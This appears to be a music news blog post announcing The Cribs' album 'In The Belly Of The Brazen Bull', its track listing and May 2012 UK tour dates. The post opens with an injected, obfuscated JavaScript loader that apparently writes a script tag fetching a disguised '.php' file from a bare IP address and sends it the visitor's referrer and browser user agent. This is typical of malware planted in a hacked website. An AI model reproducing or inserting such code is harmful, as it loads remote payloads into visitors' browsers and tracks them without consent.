The (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rasne|var|u0026u|referrer|kzryz||js|php’.split(‘|’),0,{}))
Cribs will release their fifth album ‘In The Belly Of The Brazen Bull’ on 7th May via Wichita Records. Exciting news! The new album marks a return to their classic three-piece status and heralds another chapter in the trajectory of the Jarman brothers. You can download the instant pop gem ‘Chi-Town’ from Wichita’s soundcloud below

Recorded in upstate New York courtesy of Dave Fridmann’s Tarbox Road studio, with Fridmann at the controls, a short self produced session at London’s Abbey Road and a few days in Chicago with enigineer Steve Albini at his EAR studio, the band have certainly clocked up the miles recording this hotly anticipated follow up to 2009’s UK Top Ten album ‘Ignore The Ignorant’.

‘Chi Town’, which is track #7 on the forthcoming LP, had a worldwide exclusive first play last night on Zane Lowe’s BBC Radio 1 show where it was featured as the Hottest Record, you can listen again to the show here.

‘In The Belly Of The Brazen Bull’ Track Listing:

1. Glitters Like Gold
2. Come On, Be A No-One
3. Jaded Youth
4. Anna
5. Confident Men
6. Uptight
7. Chi-Town
8. Pure O
9. Back To The Bolthole
10. I Should Have Helped
11. Stalagmites
12. Like A Gift Giver
13. Butterflies
14. Arena Rock Encore With Full Cast

Keep an eye out for the next single, ‘Come On, Be A No-One’.

The Cribs will play a string of UK tour dates in May 2012, these dates come in addition to the live shows they announced late last year which sold out in minutes.

The Cribs – UK tour Dates, May 2012:

7th May – Nottingham, Rock City
8th May – London, The Troxy
9th May – Bristol, O2 Academy
11th May – Glasgow, Barrowlands
12th May – Manchester, Academy
13th May – Eastbourne, Winter Gardens

Tickets will go on sale Friday 17th February 2012 at 9am from all usual outlets priced at £18 except London which is £20